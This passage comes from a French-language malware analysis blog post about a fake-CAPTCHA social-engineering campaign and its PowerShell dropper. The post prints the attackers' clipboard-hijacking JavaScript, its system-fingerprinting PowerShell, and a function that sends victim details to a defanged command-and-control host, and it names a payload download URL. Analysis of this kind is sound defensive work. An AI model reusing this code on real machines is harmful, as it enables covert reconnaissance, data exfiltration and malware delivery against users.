background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Il est int\u00e9ressant de constater que de nombreux console.log sont utilis\u00e9s (probablement des traces de debug oubli\u00e9es), ce qui permet de suivre, c\u00f4t\u00e9 navigateur, l\u2019ex\u00e9cution du code \u00e9tape par \u00e9tape. L\u2019image ci\u2011dessous illustre ces <code>console.log<\/code> et leur encha\u00eenement\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774003\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h4>Surveillance et interception du copier-coller<\/h4>\n<p>Les auteurs de ce code ont probablement pens\u00e9\u00a0: \u00ab\u00a0Et si l\u2019utilisateur copie autre chose depuis la page\u00a0?\u00a0\u00bb. Afin de s\u2019assurer que la commande malveillante soit toujours dans le presse-papiers, ils ont cr\u00e9\u00e9 une fonction qui intercepte toutes les actions de copie et remplace automatiquement le contenu du presse\u2011papiers par la commande malveillante. En clair, si vous copiez un mot ou un texte sur la page, vous copiez en r\u00e9alit\u00e9 la commande malveillante.<\/p>\n<p>Nous supposons qu\u2019il s\u2019agit d\u2019une tentative de protection pour garantir que la commande soit toujours dans le presse-papiers, mais cette protection est loin d\u2019\u00eatre efficace\u00a0: il suffit de copier un texte depuis un autre onglet ou en dehors de la page pour que leur plan tombe \u00e0 l\u2019eau...<\/p>\n<p>Le code ci\u2011dessous illustre cette op\u00e9ration. On peut \u00e9galement constater que <strong>la fonction est con\u00e7ue pour intercepter les copies sur tous les navigateurs,<\/strong> afin de maximiser les chances que la commande malveillante soit copi\u00e9e dans le presse\u2011papiers.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong>intercepteCopy<\/strong><\/code><\/p>\n<p><code>document.addEventListener('copy', function (e) {<br \/>\ne.preventDefault();<br \/>\n<span style=\"color: #0000ff;\"><strong>if<\/strong><\/span> (command) {<br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> (e.clipboardData) {<br \/>\ne.clipboardData.setData('text\/plain', command);<br \/>\nconsole.log('<span style=\"color: #333399;\">Global<\/span> copy intercepted, command set <span style=\"color: #0000ff;\"><strong>to<\/strong> clipboard<\/span>');<br \/>\n} <span style=\"color: #0000ff;\"><strong>else if<\/strong><\/span> (window.clipboardData) {<br \/>\nwindow.clipboardData.setData('Text', command);<br \/>\nconsole.log('<span style=\"color: #333399;\">Global<\/span> copy intercepted (IE), command set <span style=\"color: #0000ff;\"><strong>to<\/strong> clipboard<\/span>');<br \/>\n}<br \/>\n} <strong><span style=\"color: #0000ff;\">catch<\/span><\/strong> (err) {<br \/>\nconsole.error('<span style=\"color: #333399;\">Error<\/span> in global copy handler:', err);<br \/>\n}<br \/>\n}<br \/>\n});<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h3>Suivez les instructions<\/h3>\n<p>\u00c0 ce stade, la victime n\u2019a plus que quelques actions \u00e0 effectuer. L\u2019image ci-dessous montre les instructions qui lui sont pr\u00e9sent\u00e9es. En suivant ces \u00e9tapes, la victime ex\u00e9cute elle-m\u00eame la commande malveillante, ce qui marque la fin de l'ing\u00e9nierie sociale et permet le t\u00e9l\u00e9chargement d\u2019un autre script, d\u00e9taill\u00e9 dans la section suivante.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774008\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h3>R\u00e9capitulatif de la phase d'acc\u00e8s initial<\/h3>\n<p>La premi\u00e8re \u00e9tape de la cha\u00eene d'attaque repose enti\u00e8rement sur de l'ing\u00e9nierie sociale via une fausse interface de type CAPTCHA. Ici, aucune exploitation technique\u00a0: <strong>tout repose sur l\u2019utilisateur, qui est amen\u00e9 \u00e0 effectuer lui-m\u00eame les actions critiques.<\/strong><\/p>\n<p>Entre la copie forc\u00e9e dans le presse-papiers, l\u2019interception des actions de copie et une interface cr\u00e9dible, tout est fait pour maximiser les chances que la commande malveillante soit ex\u00e9cut\u00e9e.<\/p>\n<p>Au final, la commande malveillante est lanc\u00e9e par la victime elle-m\u00eame, ce qui permet de contourner assez facilement les protections classiques. Le m\u00e9canisme est simple, mais efficace.<\/p>\n<h2>Phase d'ex\u00e9cution<\/h2>\n<p>Lors de notre premi\u00e8re analyse, nous avons suppos\u00e9 que, puisqu\u2019aucune obfuscation n\u2019\u00e9tait pr\u00e9sente dans le code JavaScript, le script t\u00e9l\u00e9charg\u00e9 n'en comporterait pas non plus. Cette hypoth\u00e8se s\u2019est av\u00e9r\u00e9e fausse.<\/p>\n<p>Ci-dessous un extrait illustrant ce point\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"774013\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]L\u2019analyse du code met en \u00e9vidence cinq \u00e9tapes-cl\u00e9s\u00a0: il s\u2019agit d\u2019un dropper classique, qui t\u00e9l\u00e9charge, d\u00e9ploie, met en place un m\u00e9canisme de persistance et ex\u00e9cute une autre charge depuis Internet (probablement la charge finale).<\/p>\n<p>Nous allons d\u00e9sormais \u00e9tudier ensemble chacun d'entre elles.<\/p>\n<h3>Fingerprinting du syst\u00e8me<\/h3>\n<p><strong>Le script commence par une phase de reconnaissance du syst\u00e8me.<\/strong> Son objectif est de collecter des informations d\u00e9taill\u00e9es sur la machine de la victime afin de d\u00e9terminer l\u2019environnement dans lequel il s\u2019ex\u00e9cute. Il utilise des commandes PowerShell natives et des requ\u00eates WMI pour r\u00e9cup\u00e9rer des donn\u00e9es sur le syst\u00e8me d\u2019exploitation, le mat\u00e9riel, les comptes utilisateurs, la pr\u00e9sence d\u2019antivirus, et d\u2019autres param\u00e8tres critiques.<\/p>\n<p>Ces informations sont ensuite transmises au serveur de commandes via une requ\u00eate vers une URL construite dynamiquement via la fonction ci-dessous\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong>elbdfmh_zhgbspmno_bdwttqsxb_bxlhbsehf3rs2q<\/strong><\/code><\/p>\n<p><code>function elbdfmh_zhgbspmno_bdwttqsxb_bxlhbsehf3rs2q($event, $note=\"\", $path=\"\", $file=\"\") {<br \/>\n$url = 'https:\/\/wiosyrondaty[.]com' + '\/<span style=\"color: #0000ff;\">0<\/span>I7IRN3o4o8GefoYto39mLjnEmdxcEEK73hReyAT6-<span style=\"color: #333399;\">A<\/span>'<br \/>\n$n = (<span style=\"color: #333399;\">Get-Random -Minimum<\/span> <span style=\"color: #0000ff;\">1000<\/span> <span style=\"color: #333399;\">-Maximum<\/span> <span style=\"color: #0000ff;\">99999<\/span>)<br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n$getUrl = $url + '?id=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$vxflcwek_taxuk_klnlrpnujh4w1ld1eccq4c) + '&amp;s=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$event) + '&amp;user=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$ccnvc_jxjlbn_derwuvwayblqdg5) + '&amp;pc=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$hcgzi_xkbejhfx3hrl9cz55jv1t2y) + '&amp;cwd=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$path) + '&amp;osver=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$nckk_rvcjmubkd1_kzegd9_pryqmenc) + '&amp;osname=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$rzakz_mfgapwedtcl4l2z4tpdk) + '&amp;pcmodel=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$psqij_wybmtargz_gieamgogg65xc36zed8) + '&amp;pcmanuf=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$eip_nhnwzepml9wcacm7xgv08n4819ur) + '&amp;psv=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$zwwjog_efxw_xyp8_lahb) + '&amp;admin=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$kty5_evznwrx_wzv67xfu) + '&amp;avinfo=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$zdqn_noxiudjz10xipuujr9nau) + '&amp;cpu=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$wqbat6_ymbxnzy_myrwplsco_bt) + '&amp;ram=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$ptuucgsqt8_yzawg7tubg5y0yd1vs) + '&amp;gpu=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$hxkwtae_aajae45hujan96) + '&amp;domain=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$ichdxegc_zanevfyp2y) + '&amp;arch=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$zmb6_vjwgxzwh6_xfgvtqh94gnmd) + '&amp;tz=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$rdfboyqe_mik_ikzxrxr5i1gtwow33do) + '&amp;noise=' + $n<br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($file -ne $<span style=\"color: #0000ff;\"><strong>null<\/strong><\/span> -and [string]$file -ne '') { $getUrl += '&amp;exe_name=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$file) }<br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($note -ne $<span style=\"color: #0000ff;\"><strong>null<\/strong><\/span> -and [string]$note -ne '') { $getUrl += '&amp;msg=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$note) }<br \/>\n$<strong><span style=\"color: #0000ff;\">null<\/span><\/strong> = <span style=\"color: #333399;\">Invoke-WebRequest -Uri<\/span> $getUrl <span style=\"color: #333399;\">-Method<\/span> GET <span style=\"color: #333399;\">-UseBasicParsing -TimeoutSec<\/span> <span style=\"color: #0000ff;\">12<\/span><br \/>\n} <strong><span style=\"color: #0000ff;\">catch<\/span><\/strong> {<br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n$m = $url + '?id=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$vxflcwek_taxuk_klnlrpnujh4w1ld1eccq4c) + '&amp;s=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$event) + '&amp;user=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$ccnvc_jxjlbn_derwuvwayblqdg5) + '&amp;pc=' + <span style=\"color: #333399;\">[System.Uri]<\/span>::<span style=\"color: #333399;\">EscapeDataString<\/span>([string]$hcgzi_xkbejhfx3hrl9cz55jv1t2y) + '&amp;noise=' + $n<br \/>\n$<strong><span style=\"color: #0000ff;\">null<\/span><\/strong> = <span style=\"color: #333399;\">Invoke-WebRequest<\/span> <span style=\"color: #333399;\">-Uri<\/span> $m <span style=\"color: #333399;\">-Method<\/span> GET <span style=\"color: #333399;\">-UseBasicParsing -TimeoutSec<\/span> <span style=\"color: #0000ff;\">12<\/span><br \/>\n} <strong><span style=\"color: #0000ff;\">catch<\/span><\/strong> { }<br \/>\n}<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<span style=\"color: #000000;\">Si le syst\u00e8me cible ne correspond pas aux attentes (trop vieux, non pertinent, etc.), le dropper ne r\u00e9agit pas\u00a0: il ne comporte aucun m\u00e9canisme d'arr\u00eat et continue son ex\u00e9cution.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Ci-dessous les lignes de code responsables de la collecte des informations :<\/p>\n<p><strong>\u2014 Collecte de base (variables d'environnement) :<\/strong> Le script commence par r\u00e9cup\u00e9rer des informations simples via les variables d\u2019environnement, comme le nom d\u2019utilisateur et le nom de la machine.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$ccnvc_jxjlbn_derwuvwayblqdg5 = $env:USERNAME<br \/>\n$hcgzi_xkbejhfx3hrl9cz55jv1t2y = $env:COMPUTERNAME<br \/>\n$nckk_rvcjmubkd1_kzegd9_pryqmenc = <span style=\"color: #333399;\">[Environment]<\/span>::<span style=\"color: #333399;\">OSVersion.VersionString<\/span><\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Informations syst\u00e8me via WMI :<\/strong> Des requ\u00eates WMI sont utilis\u00e9es pour obtenir des d\u00e9tails plus pr\u00e9cis sur le fabricant de PC et le mod\u00e8le.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$ilmnd_ltuvggtn_wcj03ql6wqb = <span style=\"color: #333399;\">Get-WmiObject -Class Win32_ComputerSystem<\/span><br \/>\n$psqij_wybmtargz_gieamgogg65xc36zed8 = $<span style=\"color: #333399;\">ilmnd_ltuvggtn_wcj03ql6wqb.Model<\/span><br \/>\n$eip_nhnwzepml9wcacm7xgv08n4819ur = $<span style=\"color: #333399;\">ilmnd_ltuvggtn_wcj03ql6wqb.Manufacturer<\/span><\/code><\/p>\n<p><code>$rzakz_mfgapwedtcl4l2z4tpdk = (<span style=\"color: #333399;\">Get-WmiObject -Class Win32_OperatingSystem<\/span>).Caption<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Version PowerShell &amp; privil\u00e8ges\u00a0:<\/strong> Le script v\u00e9rifie la version de Powershell et va d\u00e9terminer si le script s\u2019ex\u00e9cute sous un compte disposant des droits d\u2019administrateur.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$zwwjog_efxw_xyp8_lahb = $<span style=\"color: #333399;\">PSVersionTable.PSVersion.ToString<\/span>()<\/code><\/p>\n<p><code>$kty5_evznwrx_wzv67xfu = (<br \/>\n[<span style=\"color: #333399;\">Security.Principal.WindowsPrincipal<\/span>]<br \/>\n[<span style=\"color: #333399;\">Security.Principal.WindowsIdentity<\/span>]::<span style=\"color: #333399;\">GetCurrent<\/span>()<br \/>\n).IsInRole([<span style=\"color: #333399;\">Security.Principal.WindowsBuiltInRole<\/span>]::<span style=\"color: #333399;\">Administrator<\/span>)<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 CPU :<\/strong> Des informations sur le processeur sont collect\u00e9es, en particulier le nom complet du CPU.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$p = <span style=\"color: #333399;\">Get-WmiObject -Class Win32_Processor -ErrorAction SilentlyContinue<\/span> | <span style=\"color: #333399;\">Select-Object -First<\/span> <span style=\"color: #0000ff;\">1<\/span><br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($p -and $p.Name) {<br \/>\n$wqbat6_ymbxnzy_myrwplsco_bt = ($<span style=\"color: #333399;\">p.Name<\/span> -replace '\\s{2,}', ' ').Trim()<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 RAM :<\/strong> La quantit\u00e9 de m\u00e9moire vive disponible est r\u00e9cup\u00e9r\u00e9e.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$cs = <span style=\"color: #333399;\">Get-WmiObject -Class Win32_ComputerSystem -ErrorAction SilentlyContinue<\/span><br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($cs -and $<strong><span style=\"color: #0000ff;\">null<\/span><\/strong> -ne $<span style=\"color: #333399;\">cs.TotalPhysicalMemory<\/span>) {<br \/>\n$gb = [math]::<span style=\"color: #333399;\">Round<\/span>($<span style=\"color: #333399;\">cs.TotalPhysicalMemory<\/span> \/ <span style=\"color: #0000ff;\">1<\/span>GB, <span style=\"color: #0000ff;\">1<\/span>)<br \/>\n$ptuucgsqt8_yzawg7tubg5y0yd1vs = \"$gb GB\"<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Antivirus :<\/strong> Une requ\u00eate permet de d\u00e9tecter les solutions antivirus install\u00e9es sur le syst\u00e8me.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$zdqn_noxiudjz10xipuujr9nau = <span style=\"color: #333399;\">Get-CimInstance -ClassName AntiVirusProduct<\/span> `<br \/>\n-<span style=\"color: #333399;\">Namespace<\/span> root\/<span style=\"color: #333399;\">SecurityCenter2 -ErrorAction SilentlyContinue |<\/span><br \/>\n<span style=\"color: #333399;\">Select-Object -ExpandProperty<\/span> displayName<\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($zdqn_noxiudjz10xipuujr9nau) {<br \/>\n$zdqn_noxiudjz10xipuujr9nau = ($zdqn_noxiudjz10xipuujr9nau -join \" <span style=\"color: #0000ff;\">|<\/span> \")<br \/>\n} <strong><span style=\"color: #0000ff;\">else<\/span><\/strong> {<br \/>\n$zdqn_noxiudjz10xipuujr9nau = <span style=\"color: #008000;\">\"None\"<\/span><br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Domaine :<\/strong> Le script tente de d\u00e9terminer si la machine est rattach\u00e9e \u00e0 un domaine Active Directory.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong><span style=\"color: #0000ff;\">if<\/span><\/strong> ($env:USERDOMAIN) {<br \/>\n$ichdxegc_zanevfyp2y = $env:USERDOMAIN<br \/>\n} elseif ($env:LOGONSERVER) {<br \/>\n$ichdxegc_zanevfyp2y = $env:LOGONSERVER -replace '\\\\', ''<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Architecture :<\/strong> L\u2019architecture du syst\u00e8me (32 ou 64 bits) est identifi\u00e9e.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong><span style=\"color: #0000ff;\">if<\/span><\/strong> (<span style=\"color: #333399;\">[Environment]<\/span>::<span style=\"color: #333399;\">Is64BitOperatingSystem<\/span>) {<br \/>\n$zmb6_vjwgxzwh6_xfgvtqh94gnmd = <span style=\"color: #008000;\">\"x64\"<\/span><br \/>\n} <strong><span style=\"color: #0000ff;\">else<\/span><\/strong> {<br \/>\n$zmb6_vjwgxzwh6_xfgvtqh94gnmd = <span style=\"color: #008000;\">\"x86\"<\/span><br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<strong>\u2014 Fuseau horaire :<\/strong> Le fuseau horaire est r\u00e9cup\u00e9r\u00e9.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code>$tz = <span style=\"color: #333399;\">Get-TimeZone -ErrorAction SilentlyContinue<\/span><br \/>\n<span style=\"color: #0000ff;\"><strong>if<\/strong><\/span> ($tz) {<br \/>\n$rdfboyqe_mik_ikzxrxr5i1gtwow33do = $<span style=\"color: #333399;\">tz<\/span>.<span style=\"color: #333399;\">Id<\/span><br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n<h3>T\u00e9l\u00e9chargement d'un autre payload<\/h3>\n<p>Apr\u00e8s la reconnaissance, le dropper ne perd pas de temps et t\u00e9l\u00e9charge une archive ZIP depuis https:\/\/hailmeinc[.]com\/bkmsiqop[.]zip en utilisant principalement l\u2019API HttpClient. Il contient une gestion avanc\u00e9e des erreurs avec un m\u00e9canisme de compteur de tentatives (<code>$maxAttempts = 4<\/code>). Le fichier est d\u2019abord enregistr\u00e9 sous forme temporaire (.tmp) dans le dossier <code>%TEMP%<\/code>, puis sa taille et sa validit\u00e9 en tant qu\u2019archive ZIP sont v\u00e9rifi\u00e9es avant d\u2019\u00eatre renomm\u00e9 en .zip.<\/p>\n<p>En cas d\u2019\u00e9chec des premi\u00e8res tentatives (jusqu\u2019\u00e0 3), le script bascule vers une m\u00e9thode alternative en utilisant <code>Invoke-WebRequest<\/code>. Une fois le t\u00e9l\u00e9chargement valid\u00e9, le script envoie un message de succ\u00e8s au serveur C2 (Command and Control).[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<span style=\"color: #000000;\"><strong>Info<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Si le t\u00e9l\u00e9chargement de la charge \u00e9choue ou est invalide, le script supprime les fichiers temporaires, envoie un message <code>download_fail<\/code> au serveur C2, et l\u2019infection s\u2019arr\u00eate.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" 